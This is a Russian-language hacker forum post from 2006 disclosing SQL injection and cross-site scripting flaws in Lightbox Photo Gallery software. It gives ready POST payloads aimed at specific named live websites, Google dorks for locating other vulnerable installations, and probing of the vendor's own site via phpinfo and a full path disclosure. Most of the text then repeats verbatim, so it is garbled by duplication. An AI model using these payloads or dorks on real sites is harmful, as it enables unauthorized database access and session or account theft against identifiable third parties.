1ten0.0net1
13.11.2006, 20:41
В версиях Advanced и Proffessional существует возможность проведения SQL - injection из-за отсутствия фильтрации спец. символов в переменной search_fields[]в скрипте adSearch.php (расширенный поиск).
Пример:
_http://www.gardenvisit.com/royalty-free-images/photos/adSearch.php
POST: search_mode=search&keyword=%27&search_in=all&search_fields%5B%5D=dis_name&search_fields%5B%5D=description&search_fields%5B%5D=author&search_fields%5B%5D=copyright&search_fields%5B%5D=keywords&search_fields%5B%5D=ipts))/*&operand=OR&submit=Search
Во всех версиях существует возможность проведения XSS (в этом скрипте это может быть использовано, напрмер, для доступа к приватной фотогалерее..)
Уязвимы 2 параметра: email и category.
Пример:
_http://lightbox.adventistevangelism.com/index.php
POST: category=%3Ch1%3EHidook!
Google trick (dorks):
SQL:
Powered by Lightbox Photo Gallery Software & VSS ADVANCED SEARCH
XSS: inurl:lightbox inurl:category
По хорошей традиции решил проверить сайт разработчика бажного скрипта и вот что нашёл:
_http://www.lightboxphoto.com/phpinfo.php
Старенький Линух.
Наша XSS:
_http://www.lightboxphoto.com/sales_gallery/index.php
POST: lightbox=&category=%3Ch1%3EOumph!%3C/h1%3E
Наша SQL:
_http://www.lightboxphoto.com/gallery_software_ent_demo/adSearch.php
POST: search_mode=search&keyword=%27&search_in=all&search_fields%5B%5D=dis_name&search_fields%5B%5D=description&search_fields%5B%5D=author&search_fields%5B%5D=copyright&search_fields%5B%5D=keywords&search_fields%5B%5D=iptn))/*&operand=OR&submit=Search
Кроме того можно узнать полный путь из-за отсутствия
фильтрации переменных, передаваемых в cookies. (возможно, это справедливо для всех сайтов, на которых установлен данный скрипт....)
Warning: Cannot modify header information - headers already sent by (output started at
/home/lightbox/public_html/sales_gallery/include/session_save_path.inc.php:7) in /home/lightbox/public_html/sales_gallery/include/session.inc.php on line 26
P. S. Настоятельно рекомендуя проверять скрипт на наличие директории config.
Пример:
_http://www.gardenvisit.com/royalty-free-images/photos/adSearch.php
POST: search_mode=search&keyword=%27&search_in=all&search_fields%5B%5D=dis_name&search_fields%5B%5D=description&search_fields%5B%5D=author&search_fields%5B%5D=copyright&search_fields%5B%5D=keywords&search_fields%5B%5D=ipts))/*&operand=OR&submit=Search
Во всех версиях существует возможность проведения XSS (в этом скрипте это может быть использовано, напрмер, для доступа к приватной фотогалерее..)
Уязвимы 2 параметра: email и category.
Пример:
_http://lightbox.adventistevangelism.com/index.php
POST: category=%3Ch1%3EHidook!
Google trick (dorks):
SQL:
Powered by Lightbox Photo Gallery Software & VSS ADVANCED SEARCH
XSS: inurl:lightbox inurl:category
По хорошей традиции решил проверить сайт разработчика бажного скрипта и вот что нашёл:
_http://www.lightboxphoto.com/phpinfo.php
Старенький Линух.
Наша XSS:
_http://www.lightboxphoto.com/sales_gallery/index.php
POST: lightbox=&category=%3Ch1%3EOumph!%3C/h1%3E
Наша SQL:
_http://www.lightboxphoto.com/gallery_software_ent_demo/adSearch.php
POST: search_mode=search&keyword=%27&search_in=all&search_fields%5B%5D=dis_name&search_fields%5B%5D=description&search_fields%5B%5D=author&search_fields%5B%5D=copyright&search_fields%5B%5D=keywords&search_fields%5B%5D=iptn))/*&operand=OR&submit=Search
Кроме того можно узнать полный путь из-за отсутствия
фильтрации переменных, передаваемых в cookies. (возможно, это справедливо для всех сайтов, на которых установлен данный скрипт....)
Warning: Cannot modify header information - headers already sent by (output started at
/home/lightbox/public_html/sales_gallery/include/session_save_path.inc.php:7) in /home/lightbox/public_html/sales_gallery/include/session.inc.php on line 26
P. S. Настоятельно рекомендуя проверять скрипт на наличие директории config.